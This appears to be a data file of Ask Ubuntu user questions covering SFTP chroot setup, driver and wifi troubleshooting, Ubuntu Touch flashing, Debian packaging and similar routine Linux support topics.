259388	sftp with chrooted directory project	first thank you very much for all your post . i am completely new to ubuntu and the unix world and have found almost all the answers i needed except how to properly setup and sftp server with chrooted directories . what i would like to do is create an sftp server with multiple groups accessing only one directory depending on the group the user is at . ex.1 group-a ( user1 , user2 and useer3 ) have access to /home/research ex.2 group-b ( user4 , user5 and user6 ) have access to /home/projetcs if i just setup the user and assing then the same home directory that works as far as accessing the sftp and uploading files . but the user is able to view the directory tree and able to download files from any other users and that is not aceptable for what i need to do . sudo mkdir /home/research sudo mkdir /home/projects useradd user1 -d /home/research useradd user4 -d /home/projects chmod 775 /home/research chmod 775 /home/projects vi /etc/ssh/sshd_config subsystem sftp internal-sftp match group research chrootdirectory % h allowtcpforwarding no forcecommand internal-sftp how can i have multiple groups with full access to their own directories and without access to any other directories ? thank you this is my first post : )
259393	powertop color codes	i am running powertop in ubuntu 10.04 . it shows a horizontal bar near the top that displays something like : wakeups-from-idle per second : 723.6 interval : 10.0s my question is , why is the background color on this line red , and on rare occasions blue ? what do these colors mean ? unfortunately the man page does not explain this , neither does a quick google search .
259394	ubuntu 12.10 intel ironlake graphics driver	i 'm running ubuntu 12.10 and steam on my laptop . i need to install the intel graphics driver . when i go into details on my system in says the graphics is unknown . some steam games will launch , i have had splice , defcon and a few other small games working but when i launch counter-strike : source or tf2 the audio plays but the screen is just black . any help is really appreciated
259396	location of ubuntu mobile image ?	this may be naive , but where is the ubuntu install file to be flashed onto an android device ? i see no links to that image in the instructions or release notes . thanks !
259397	will ubuntu mobile support side-by-side installation with android/windows phone ?	installing ubuntu 's desktop version in side-by-side configuration with windows ( or ) other linux os . is this same feature available on ubuntu mobile edition ?
259399	virtualbox ubuntu installation , general troubleshooting ( installation hangs )	i am currently running windows 7 , and am attempting to set up an ubuntu installation in virtualbox . the purpose of my installation is educational - i would very much like to `` learn '' linux . unfortunately , i am encountering various problems with the installation that i 'm finding hard to pin down . i have tried to look for similar threads with solutions , but as i understand very little of what is going on it 's hard to know what is relevant . i would very much appreciate a guiding hand to point me to things that i should know , and make sure i 'm doing nothing `` wrong '' . story so far : first ( naive ) attempt to install - successful , but extremely slow ( installed overnight ) . there was an extreme lag problem ( all programs , and mouse input were lagging ) . the lag problem was fixed by switching the `` enable io apic '' option to on . at this point , ubuntu was running , and seemed fully functional . however , since i had only allocated 8gb of disk space i very quickly ran out ( i immediately attempted to install full tex support , which is quite space-hungry ! ) . the internet made increasing disk space look like a particularly nasty chore , so i decided the easiest way would be to do a full reinstall , with 40gb space . i deleted the functional virtual machine , not expecting any problems with a reinstall ( retrospectively a mistake ) . several unsuccessful attempts . according to all internet sources , my linux install should take around 40 minutes . however , the installation keeps getting stuck at different points , for hours ( each time , i waited up to ~5 hours before closing and trying again ) . for example , one time it was stuck at something that sounded like `` post-installation trigger software-center '' , and my current attempt is stuck at `` configuring hardware '' . after each new attempt , i must delete the partition and allocate a new , clean one , else the install hangs immediately , a couple of screens after the initial `` install '' button . i systematically enable the io apic option , otherwise the installation proceeds extremely slowly , as before . a couple of things i have noticed , and do n't understand/am worried about only 12mb of `` video memory '' have been allocated . i 'm not sure whether this is the same thing , but my host os has access to 1gb dedicated video ram . after deleting partitions , the free space does not seem to be recognised by my host os . ( in windows explorer , the free space displayed next to my c : drive decreases by 2gb after each attempt ) . perhaps this problem will solve itself ? ( i believe windows 7 schedules automatic defragmentation ) . specs/relevant information ubuntu version : 12.10 virtualbox version : 4.2.6 host os : windows 7 home edition ( service pack 1 ) hardware : aspire 5755g laptop , 6gb ram ( 1gb allocated to guest os ) 500gb hdd ( 40gb allocated during unsuccessful attempts ) intel core i7-2670qm , 2.2ghz nvidia geforce gt630m , 1gb dedi vram thank you in advance for your valuable time ! please do n't hesitate to ask for additional information .
259403	keyboard/mouse stopped working after 12.04 upgrade	so , i upgraded to 12.04 and when i booted back up , my wireless keyboard worked fine on the grub screen , but as soon as i get to the log-in screen neither the keyboard not mouse worked . i swapped them out for wired usb ones , which also do n't work . any ideas what 's up ?
259404	repeating error : invalid environment block . press any key to continue	during start up i get error : invalid environment block . press any key to continue ... i have done the steps of the first answer from the following link error : invalid environment block . press any key to continue things are good for one restart . on the second , the grub message comes back . please let me know if you have an idea of what 's going on . thanks
259405	connect to hidden wireless in ubuntu touch	i 'm trying out the developer preview for touch , and unfortunately i do n't have public wifi i can connect to . is there a way to add hidden networks ? i ca n't find any kind of settings page or anything . edit : there may be a way to do this from the command line . i found that /etc/networkmanager/system-connections/ stores a list of wifi connections that have been connected to . there may be a way to manually enter your hidden network here , though i have n't found anything yet . also , someone on irc mentioned that the phablet-network-setup script can be used to copy network settings from your desktop to the `` phablet . '' unfortunately i did n't get either of these to fully work , so if someone has had better luck please feel free to post the answer here . hopefully that helps .
259406	why does the touchpad of acer aspire v3-551g not work on ubuntu ?	i 've just bought a new pc which is acer aspire v3-551g . first of all , i installed ubuntu 12.10 . however , i could n't use some features because it 's not stable . then , i installed 12.04 . but my touchpad does n't work . i found kde-config-touchad and kcm-touchpad from the repos . even so , it still does n't work . by the way , my touchpad 's buttons work and my os is 64bit .
259407	crawler search problem	i am using ubuntu 10.04 and firefox for my web browsing . all the sudden crawler became my search provider so i went in to the search bar to the right top and deleted the crawler from the list and also deleted all add-ons that remotely looked like it was related . now whenever i use the address bar for searches it is still using crawler . how do i get rid of this deceptive little product .
259409	how do i personalize ubuntu touch ?	i installed ubuntu touch today on my nexus 7 ( grouper nakasi ) and i appear to be logged in as somebody else - a developer perhaps . i have their facebook notifications , music they like , people they know , missed calls , etc . seems a little weird . is this not ready to be personalized yet ? i ca n't find any kind of settings page to do something like a factory reset .
259412	building debian package - how do dependencies work ?	i 'm in the process of building a debian package . the goal is to package up a directory into a .deb that will have 2 dependencies that are other packages i created . when installing the .deb package , i see the errors regarding missing dependencies which is great , but it still dumps the directory and contents even though it 's missing dependencies . my question is if this is appropriate behavior ? i do not want the directory created and populated if there are missing dependencies . any help would be appreciated ! thanks ! output . dpkg -i hdf5.deb selecting previously unselected package hdf5 . ( reading database ... 305222 files and directories currently installed . ) unpacking hdf5 ( from hdf5.deb ) ... dpkg : dependency problems prevent configuration of hdf5 : hdf5 depends on szip ( > = 2.9 ) ; however : package szip is not installed . dpkg : error processing hdf5 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : hdf5
259420	ubuntu mobile installation stuck at `` the device needs to be unlocked for the following to work '' nexus 7	like the title says , it just asks for my password and then gets stuck . the bootloader is unlocked .
259425	problem installing ubuntu on nexus device	i was able to get through all of the steps until i went to type phablet-flash -b into the termial . i agreed with the terms saying yes and got the following response : starting new http connection ( 1 ) : cdimage.ubuntu.com download directory set to /home/ubuntu/downloads/phablet-flash/95 device detected as * daemon not running . starting it now on port 5037 * * daemon started successfully * unsupported device , autodetect fails device what can i do from here ? ( i have a verizon samsung galaxy nexus running android )
259426	12.04.1 server verses 12.04.1 desktop - wifi issue	i spent a couple of days trying to figure out why i could not connect to my wifi connection running 12.04.1 server but installing 12.04.1 desktop connects just fine , what am i missing here ? it 's the same machine : when server is installed i can not see the wifi card when executing ifconfig iwconfig but i do see it 's disabled when executing lshw -c network *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:00:00:00:00:00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-37-generic-pae firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : feaf0000-feafffff running desktop i navigate to network and i 'm able to see and connect to my wifi connection . why would this not work for server ? i really do n't need the desktop and i wanted to install server and be done with it but i would really like to know why does n't the server installation see / connect to my wifi ? btw : i tried everything to enable wifi and connect to my network with server and nothing worked .
259431	ubuntu drops me a grub prompt , no wubildr	i try to start ubuntu since yesterday and he does n't want to start . the first screen said : try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : ntfs5 : error : ''prefix '' is not set . and it switches to : gnu grub version 1.99-21ubuntu3.4 minimal bash-like line editing is supported . for the first word , tab list possible command completions . anywhere else tab lists possible device or file completions . grub > what i should do ?
259433	how do i change window title font size using command line in 12.10	using 12.10 , i can apply all but the last line in this answer : how do i change fonts and adjust their size ? to change font sizes . gsettings set org.gnome.desktop.interface document-font-name 'sans 10' gsettings set org.gnome.desktop.interface font-name 'ubuntu 10' gsettings set org.gnome.desktop.interface monospace-font-name 'ubuntu mono 11' gsettings set org.gnome.nautilus.desktop font 'ubuntu 10' gconftool -- set /apps/metacity/general/titlebar_font 'ubuntu bold 10 ' -- type string the last line referencing gconftool has no effect on window title font size . what is the correct command ?
259435	catch-22 : no ubuntu to install amd driver for initial ubuntu install through win8 .	without going into unnecessary detail , i purchased a laptop with win8 pre-installed , spent a couple days troubleshooting/learning how to get ubuntu 12.10 to load up from both a flash drive and a dvd-r . i can boot to the grub2 screen , but either choice of trying to install ubuntu or loading it without install sends me to blank/black screen . the bits i 've found from other threads has pointed to this possibly not having an ubuntu-specific driver installed for my graphics card . here is what i need to install : http : //www2.ati.com/drivers/linux/amd-driver-installer-catalyst-13.1-linux-x86.x86_64.zip the problem is that this unzips to a .run file ... how do i install a .run file from within windows 8 ? any ideas ? i 'm new at this so i might be behind on some of the technical jargon ... will try my best . any help is much appreciated .
259441	libreoffice not starting	mates . i was wotking with a pdf on drawer , lo crashed and did n't came back to work . when i try to load it from the console i get this error : libreoffice uno exception : invalidregistryexception : file : ///usr/lib/libreoffice/program/../share/extensions/pdfimport/components.rdb : duplicate < implementation name= '' com.sun.star.comp.documents.hybridpdfimport '' > terminate called after throwing an instance of 'com : :sun : :star : :uno : :deploymentexception' i 've tried uninstalling and installing back . any ideas ? thanks ! update i solved it ! i 've renamed extensions folder under /usr/lib/libreoffice/share , and it came back . got ta see if the pdf extensions is still working , but now at least i can run libreoffice . thanks
259453	how can i monitor cloud-init for errors , and trigger a script when it fails ?	i 'm using cloud-init to provision servers in aws , and would like my servers to send an email when they 're done ( whether they fail or succeed ) . for successful cloud-init runs , the solution is trivial . cloud-init has a built-in module for this kind of thing . from the the source : # when cloud-init is finished running including having run # cloud_init_modules , then it will run this command . the default # is to emit an upstart signal as shown below . if the value is a # list , it will be passed to popen . if it is a string , it will be # invoked through 'sh -c ' . # # default value : # cc_ready_cmd : [ initctl , emit , cloud-config , cloud_cfg=/var/lib/instance//cloud-config.txt ] # example : # cc_ready_cmd : [ sh , -c , 'echo hi mom > /tmp/file ' ] unfortunately , this does n't work when a cloud-init script fails . another answer seems to suggest i could monitor upstart for success , but again , it does n't appear to work for failure . the following upstart job , for example , executes both on success and failure : start on stopped cloud-final script echo `` cloud-final stopped '' > /tmp/cloud end script can i monitor cloud-init for failure and trigger a script when it exits ? if so , how could i do it ? i 'm using ubuntu v12.04 .
259456	wicd wpa2-peap connection without domain	i 'm having trouble connecting to my school 's wifi . it uses wpa2-peap and tkip . the instructions for connecting tell me to leave the domain field blank and just enter my user name and password . this works with network-manager , but wicd tells me that the domain is required . i assume i need to edit an encryption script some where , but i would n't know what to change . how can i connect to this network ? thanks . a little late , but as promised , here 's the edited encryption template . name = tusecure author = atiketemola version = 1 require identity *username password *password protected password *password -- -- - ctrl_interface=/var/run/wpa_supplicant network= { ssid= '' $ _essid '' proto=rsn key_mgmt=wpa-eap pairwise=ccmp eap=peap identity= '' $ _identity '' password= '' $ _password '' phase2= '' auth=mschapv2 '' }
259459	phablet-flash detects a nexus 7 as 'tilapia '	when i try to flash ubuntu phone os in my nexus 7 , next phablet-flash , appear device detected as tilapia unsupported device , autodetect fails device the device is just unlocked and the usb debug is on . how i can do ?
259460	how to use intel graphics on macbook pro w/12.10 ?	i 've installed 12.10 on a macbook pro 8,2 using the mac install image . the install was successful , but i do n't see the /boot/efi partition i expected to see . therefore , i assume it was not an efi install . there is a boot_grub partition , instead . more to the point of this question , lspci sees only the amd card , not that and the integrated intel gpu . being able to use vgaswitcheroo to enable the intel card was the primary motivation for installing 12.10 . vgaswitcheroo is n't in /sys/kernel/debug , though . the fglrx drivers from additional drivers result in a broken display : no dash and no panel . i 've no option but to use the default open source radeon driver and that seems to trigger the fans quite often . so , i 'd like to use the intel card in the hope it wo n't push the fans as much . how can i get from here to there ?
259464	why do 12.04 and 12.10 run extremely slow on my pc ?	i tried to install the 12.10 version , using wubi . after running it , i could not even move the mouse , it was slow . then i tried the 12.04 version again using wubi , but it was the same . the os was very unresponsive , slow , and the internet connection just kept disconnecting by itself ! my computer info : inter pentium 4 cpu 3.00 ghz , 2.99 ghz , 504 mb of ram hp 1740
259466	nexus 7 freezes on lockscreen on ubuntu touch preview	so i just finished flashing today 's new ubuntu touch preview to my wifi-only nexus 7 ( nakasi ) , however it freezes at the lockscreen and refuses to let me get any further . the clock moves , & i 'm able to lock/unlock the tablet , but everything else appears to be frozen . any advice ? should i just flash android 4.2.2 back on it & try again ?
259469	ca n't get bcm4331 wireless working right	i have ubuntu 12.10 on my macbook pro , which has bcm4331 for wifi . it 's been working fairly well , except i 've been having a problem that the connection will randomly stop working . ubuntu still says i 'm connected , but if i try pinging an address i get 100 % dropped packets . i have to disconnect and reconnect to get it working again . other question i decided to see if i could solve this , and found this answer , which is for the bcm4313 , but i thought might also work for 4331 . i removed the b43-fwcutter package , which was installed on my system , and am trying to get it to use the brcmsmac driver , but it 's not working . after removing the b43-fwcutter package , i have n't been able to connect to the internet at all . i did `` sudo modprobe brcmsmac '' and it 's showing it enabled in lsmod : colin @ macbookpro : ~ $ lsmod | grep brc brcmsmac 531905 0 mac80211 540032 2 brcmsmac , b43 bcma 35657 2 brcmsmac , b43 brcmutil 14756 1 brcmsmac cfg80211 206797 3 brcmsmac , b43 , mac80211 cordic 12575 1 brcmsmac however , lspci shows bcma being used : 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) subsystem : broadcom corporation bcm4331 802.11a/b/g/n flags : bus master , fast devsel , latency 0 , irq 17 memory at b0600000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : bcma-pci-bridge kernel modules : bcma the thing is , i have `` blacklist bcma '' in my /etc/modprobe.d/blacklist.conf , so i do n't know why it 's still using it . that lspci output is exactly what was shown when i had my wireless working , but now that i 've removed the b43-fwcutter package , it is n't functional . i found another question which does recommend b43-fwcutter , and that one is specifically for a mac product with bcm4331 , rather than bcm4313 . so is b43-fwcutter the best option , and i just have to live with these disconnects , or are there other things i can try ?
259470	trouble installing ubuntu 12.10 alongside windows 7	i have a windows 7 laptop . i downloaded the wubi.exe from ubuntu and whatnot , and ran it . after all that went well , i rebooted to finish the install.then i get a screen that says '' try ( hd0 , 0 ) : ntfs5 : no wubildr try ( hd0 , 1 ) : ntfs5 : `` nothing else ... if i let it sit for five or ten minutes it just stays there . what do i do to fix this ?
259475	fpm fails while trying to make a deb - no parameters given	this is a 2-part question really . the first part is to try and find out why fpm is n't working , the second is to find out if fpm is the answer in the first place ... background : i 've patched some files in an open-source package which i want to repackage with a different name so that it can be installed beside the existing one ( in case someone using it already has the main version installed - i do n't want to overwrite it ) . i also want to use a deb so that i can manage dependencies and have people use apt-get to install it . i did some googling and found that fpm seems to be the weapon of choice to build a .deb , but i ca n't get it to work . i installed version 0.4.29 and i 'm running ubuntu 12.04 . heres what i have in my code directory ( its the output of sudo make install ) : ~code |_main_folder |_ sub_1 |_ sub_2 |_sub 3 and i 'm trying to do this : sudo fpm -s dir -t deb -n `` my_package '' -v 1.0 -c ~/code/main_folder/ but i get this : no parameters given . you need to pass additional command arguments so that i know what you want to build packages from . for example , for '-s dir ' you would pass a list of files and directories . for '-s gem ' you would pass a one or more gems to package from . as a full example , this will make an rpm of the 'json ' rubygem : `fpm -s gem -t rpm json` { : level= > : warn } fix the above problems , and you 'll be rolling packages in no time ! { : level= > : fatal } clearly i have provided several parameters , so the error message is somewhat useless to me . i 've tried a few different variations of this command , but nothing gives me a package . i 'm wondering if its something simple and obvious , but i 'm not really sure what to try next . google shows me that this is a problem a lot of people seem to have with it , but i was n't able to find any solutions ... which makes me wonder if fpm is all its cracked up to be ... so if its not - is there another alternative to building .deb files ? its not a task i 've done before ... cheers in advance ps : i wanted to add the tag 'fpm ' to the question , but i do n't have enough reputation . it seems like a sensible tag , so if someone who does have the reputation wants to add it then it might help others in the future .
259478	black screen after lauching ubuntu	i downloaded ubuntu both on a cd ( black ) and the exe version , i tried to launch but after i click unbuntu the screen goes black and shuts off my moniter even though my combuter is still on
259491	how to change screen brightness based on screen colors ?	i would like to know if there is any way to change the screen brightness based on the screen predominant color . for example if i am browsing a web page with a lot of white color decrease the brightness but if i using some text editor with dark background for example , increase the brightness . i have tried redshift but is not what i am looking for .
259494	changing the compose key in kde	so i have become accustomed to ubuntu 's compose key setup . you press right shift+alt gr and then a sequence of characters ( eg : s , s ) and something magical happens : ă this does n't appear to work the same in kde/kubuntu . this is a problem because i love it . i have two problems : the mapping appears to have changed to right super . i want the original mapping . the dialogue ( under keyboard settings > advanced ) does not offer a combination . i ca n't do fancy arrows with -- > edit : i can do fancy arrows , the combo has just changed to - > and i have to hold the compose key . â ... hmm but i ca n't do left arrows . oh this is making my face ache . is there anything i can do ?
259496	ubuntu 12.10 wireless internet not connecting to internet intel pentium dual x86	everything has been working just fine then i installed firestarter and got an error saying that the firewall couldnt be started , so i changed the settings to wireless and it worked . i then logged off and had a good connection but was prompted to `` enter my password for keyring 'default ' which i did . not sure why that password is necessary but i unblocked 'default'keyring a couple of times and , lo , no more internet . i brought the machine to the router and plugged in the dsl cable and got that connected . also , i am being prompted to authenticate the neighbors wifi as if the system has seemingly forgotten my default settings so i have been able to miimize the noise somewhat although i still have no wireless connectivity on my laptop with ubuntu 12.10 . i am also no longer able to hover over the wifi icon and access thebdrop down menu to view the settings . in the 'network ' tab , under the heading 'wireless ' it says 'wireless ' and under that 'disconnected ' attempts to try to select my network from the list , restart , forget , re autheticate thus far have failed ,
259499	laptop hangs when restarting	when issuing a reboot from ubuntu 12.04/12.10 ( linux kernel 3.5 ) , the laptop hangs for about 1m30s on the `` restarting system '' line of the shutdown output . this only happens when i have a second drive installed on the laptop ( hdd , os is installed in hdd ) . when removing the hdd restart progresses normally ( no hangs , very fast ) . said drive contains both the swap partition ( 4gb ) and a second ext4 partition , automounted on boot , manually set on /etc/fstab : uuid=0240d6ae-722b-44ed-afad-865b1b3259c4 / ext4 errors=remount-ro , noatime , nodiratime , discard 0 1 uuid=025594dd-cd9f-4a9c-a078-88d69e4677ae none swap sw 0 0 none /tmp tmpfs nodev , nosuid , mode=1777 0 0 uuid=e9048353-e50c-4d7c-b716-9701bfdb4da9 /media/joao/data ext4 defaults 0 0 unmounting the drive before reboot does n't speed up anything , still hangs at the same step . the strange thing is , this only happens when issuing a restart , not when shutting down . anyone with any ideas/solutions ?
259501	problem with libqt4-dev . messed up dependencies	i 'm running ubuntu 12.04 and tried to update ubuntu-sdk but today it was n't possible without adding phablet-team/tools ppa as described here https : //wiki.ubuntu.com/touch/install # step_1_-_desktop_setup i did that and updated ubuntu-sdk . after that when i was trying to start qt creator i got following error : so i decided removing and installing ubuntu-sdk again might be a good idea . unfortunately it was not . when installing i got error messages . and if i try to fix it via usc i have following : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 189383 files and directories currently installed . ) unpacking libqt4-dev ( from ... /libqt4-dev_4 % 3a4.8.1-0ubuntu4.4_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libqt4-dev_4 % 3a4.8.1-0ubuntu4.4_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/uic3 ' , which is also in package qtchooser 0.0.1~git20121229.g8f08405-0ubuntu1~precise1~test5 no apport report written because maxreports is reached already dpkg-deb ( subprocess ) : subprocess data was killed by signal ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/libqt4-dev_4 % 3a4.8.1-0ubuntu4.4_i386.deb error in function : dpkg : dependency problems prevent configuration of libqtwebkit-dev : libqtwebkit-dev depends on libqt4-dev ( > = 4:4.8.0~ ) ; however : package libqt4-dev is not installed . dpkg : error processing libqtwebkit-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl-dev : libqt4-opengl-dev depends on libqt4-dev ( = 4:4.8.1-0ubuntu4.4 ) ; however : package libqt4-dev is not installed . dpkg : error processing libqt4-opengl-dev ( -- configure ) : dependency problems - leaving unconfigured
259502	hdmi to vga adapter on ubuntu 12.10	i have an ubuntu 12.10 machine with an nvidia geforce gtx 650 which has one vga output and an hdmi output , i already have one monitor connected via vga and i just recently bought an hdmi to vga converter so i could use hdmi output in the graphics card to add an extra vga monitor , the cable works fine while running on windows but , on ubuntu the screen just stays for 5 to 10 seconds and then goes off , and back again and so on , has anyone experienced something similar ?
259508	running 32bit application on 64bit ubuntu	i type in the terminal sudo apt-get install ia32-libs but i get this message : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested and impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problem , you have help broken packages .
259510	problem with svg image in qml	i use the qt5 from ppa : canonical-qt5-edgers/qt5-proper . when trying to use a svg as ab image source like image { source : `` sample.svg '' height : 100 width : 100 } i get the following error : qml qquickimage : invalid image data : file : ///home/***/sample.svg i am relatively sure though that the demo i wrote at the end of january , that also uses svg images , worked at that time . can anyone reproduce the error and should this be reported as a bug , and if so , where ?
259515	how do i make a game play in a single monitor ?	recently downloaded multiwinia and darwinia , some old favourites , from a buy of the humble introversion bundle . i 'm running ubuntu 12.04 , and when i try to launch either game , it always stretches across both of my monitors -- pretty much unplayable . how do i configure games to only run in a single monitor ? i do n't have an issue with any other programs -- chromium , vlc , libreoffice , etc . all spawn in a single monitor , and maximize within a single monitor when i try to maximize them .
259520	i bought a new battery and ubuntu 12.10 is n't recognizing it	i inherited my mom 's old laptop and installed ubuntu over top of vista , so now it is purely ubuntu . her old battery only lasted about 10 minutes , so it had to be plugged in all the time , which i did n't like . so i bought a battery , and inserted it in when it came . the laptop does n't see it at at all- no battery icon whatsoever . i can pull it out and put the old battery in and it recognizes it . the new battery comes with a program ( a .exe ) to update the bios to accommodate the new battery ... but do n't have windows anymore and wine gives me an error when i try to run it , so i am at a loss of ideas . i thought of running a virtual machine of windows to install it , or run a windows to go drive ( a new feature of windows 8 ) , but i do n't think those are good ideas as they may not work or permanently ruin something . i am not an extremely experienced user of ubuntu/linux , so i do n't where to go from here . i 'm running ubuntu 12.10 on a sony vaio vgn-nr , if that helps . also note that i just installed ubuntu the other day and have nothing important on the pc yet , so i am not afraid to reinstall ubuntu if it may help . thanks !
259525	make will not compile efitools	efitools will not compile due to this error : simple_file.c:206:2 : error : 'efi_boot_services ' has no member named 'localhandlebuffer' the source is here : efitools repository .
259526	stuck pushing to /sdcard/autodeploy.zip	currently attempting to install on my 4.2.2 nexus 7 but the installer is stuck at pushing /home/david/downloads/phablet-flash/95/quantal-preinstalled-phablet-armhf.zip to /sdcard/autodeploy.zip what can i do to get past this/make it work basically ? thanks
259528	online accounts in 12.10 facebook not working	i 've added my google , twitter , and windows live accounts without any issues . however , when i try to add a facebook account , instead of opening in the system dialogue for online accounts , it opens up a new window in chromium which seems a bit odd in the first place . then , once i authorize ubuntu to post on my behalf etc. , i finish the authorization and facebook redirects me to a page with just the word `` success '' written on it . ubuntu still does not show that it is integrated with facebook , but in my facebook app settings , i can see clearly that it is authorized . i should also note that i tried this when firefox was set as default browser and it did the same thing , so it 's not a chromium issue . any ideas/suggestions ?
259530	why does my wifi internet intermittently disappear ?	so , my internet intermittently disappears . i have no idea why ! for a while i thought it happened when i allowed update manager to auto-check for updates , but i do n't believe that 's the case now . here 's the thing , is i do n't know how to check my computer 's activity log to try and discern why this would happen , or what to look for once i 've done so ( or , how to re-post it here , so someone much smarter than me could figure it out ) . how do i properly troubleshoot this ? edit : i 've bolded what i 'd like to emphasize here . while i appreciate the suggested fix , i 've noticed an apparent change in my computer 's behavior - since i turned off the rotating desktops feature , i have experienced no connection issues . since this is a somewhat random occurrence at this time i do not want to assume a correlation between my appearance settings and my ability to stay connected to wifi . so how do i investigate ? edit2 : okay , so , this is still an apparent issue on ubuntu 13.04 so i 've removed the 12.04 tag as it does n't appear to apply . it seemed to be away for a while , but it is back , maybe as a result of upgrade ( but i had to , unity is just so much faster ! eee ) so far i have been able to reconnect by going to system settings > network > select my network and right the orange arrow > settings > toggle the mtu setting from `` automatic '' to `` 1 '' and back to `` automatic '' and save . if the problem is indeed this setting , the method described in the other post is not indicative of how to find the correct mtu setting . is there a way for me to determine the best mtu ? as an aside , this is not a problem for the windows or osx machines on my home network , just this guy : ( edit3 : per the request below , here 's the output from dmesg | tail : [ 18.209158 ] wlan0 : associate with 00:1e : e5:74:26:0f ( try 1/3 ) [ 18.213191 ] wlan0 : rx assocresp from 00:1e : e5:74:26:0f ( capab=0x411 status=0 aid=4 ) [ 18.213241 ] wlan0 : associated [ 18.213273 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 2227.016921 ] init : upstart-file-bridge main process ( 319 ) terminated with status 1 [ 2227.016961 ] init : upstart-file-bridge main process ended , respawning [ 2227.017109 ] init : upstart-udev-bridge main process ( 346 ) terminated with status 1 [ 2227.017127 ] init : upstart-udev-bridge main process ended , respawning [ 2227.017242 ] init : upstart-socket-bridge main process ( 617 ) terminated with status 1 [ 2227.017259 ] init : upstart-socket-bridge main process ended , respawning edit4 : ok , so it looks as though i might have something here . take a look at this message : [ 16.688255 ] wlan0 : authenticate with 00:1e : e5:74:26:0f [ 16.700191 ] wlan0 : send auth to 00:1e : e5:74:26:0f ( try 1/3 ) [ 16.703235 ] wlan0 : authenticated [ 16.703460 ] ath9k 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 16.703494 ] ath9k 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 16.710006 ] wlan0 : associate with 00:1e : e5:74:26:0f ( try 1/3 ) [ 16.713175 ] wlan0 : rx assocresp from 00:1e : e5:74:26:0f ( capab=0x411 status=0 aid=4 ) [ 16.713234 ] wlan0 : associated [ 16.713266 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 3170.516163 ] systemd-hostnamed [ 3772 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! i googled that last line about nss-myhostname and i got a bunch of hits regarding all kinds of other linux distros , just not really anything about ubuntu : / is this relevant at all ?
259533	remote install from custom iso	i 've googled around looking for an answer to this question , but ca n't seem to find it anywhere.. i 'm doing a setup of quite a few vms that will be running a customized version of ubuntu using the ubuntu mini remix cds . what method could i go with to install this iso remotely and simply uploading a tiny iso that can run the installer ? or maybe even just download the specific packages that i need included ? i 'm trying to avoid pxe servers as much as possible , and have seen the mini-iso from ubuntu but i ca n't see a way to customize the install . any help is appreciated . thanks !
259535	disabling intel turbo boost	i have a question concerning intel turbo boost and the ability to disable it in ubuntu 12.04 . i wanted to disable turbo boost because it produced a lot of heat and i did n't find a need for it in ubuntu ( being so lightweight as it is compared to windows ) . i found that by installing msr-tools and running modprobe msr and then : wrmsr -p ( processor ) 0x1a0 0x4000850089 where processor is the number of my cpu core allowed me to shut off turbo boost for that core . after appending msr into my etc/modules and the wrmsr lines into my rc.local i found i was able to shut off turbo boost at boot . my question is : is this method i 've used safely disabling turbo boost , or should i attempt to find a different workaround . i have an msi-ge60 with no setting in the bios for turbo boost , so changing it like this appeared to be the only way . thanks to anyone who can help .
259540	how to partition my hard drive to have a ubuntu 12.10/windows 8 dual boot with uefi ?	in the `` allocate drive space '' step , how should i partition my hdd ? i want to keep my current windows 8 installation . link to the image do i need to create another efi partition ? i 'm thinking in put 50gb to `` / '' and 150gb to `` /home '' . both mount points should live at the end of of the current `` c : '' , after resize it , right ? any other possible gotchas ?
259541	ca n't flash ubuntu to my galaxy nexus : `` device is unsupported '' . what can i do ?	i 'm attempting to flash the ubuntu for phone os onto my galaxy nexus , but after typing in the command phablet-flash -b it says that the device is unsupported and that it was detected as being toroplus . what can i do ?
259544	remove gui on ubuntu server	i installed a gui on ubuntu server 12.04 lts using sudo aptitude install -- without-recommends ubuntu-desktop not sure why just playing around . any way i would like to remove it and can not figure out how .
259546	my laptop wifi led is not working	i am using ubuntu 12.10 x64 , my laptop is asus x32u . the wifi connection is working good but the wifi led on the laptop is not working at all . here is the rfkill list result 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no could anyone help me this ?
259547	how can my app request sudo permissions when installed from the software center ?	i have written a usb over ip server for ubuntu and want to deploy it via the ubuntu software center however for the app to run , it requires sudo access to udev files . is there anyway to get sudo access through the software center for this functionality .
259548	is there anyway for to bring installed programs from one ubuntu pc to another ?	is there anyway for to bring installed programs from one ubuntu pc to another , without installing it from the software centre ? i am having problems trying to install mypaint on my desktop , though there was no problem on my netbook .
259555	ubuntu touch availability on tf101	i would like to ask if there is any plan or indicative timeline if an installation would be made available for asus transformer tf101 device .
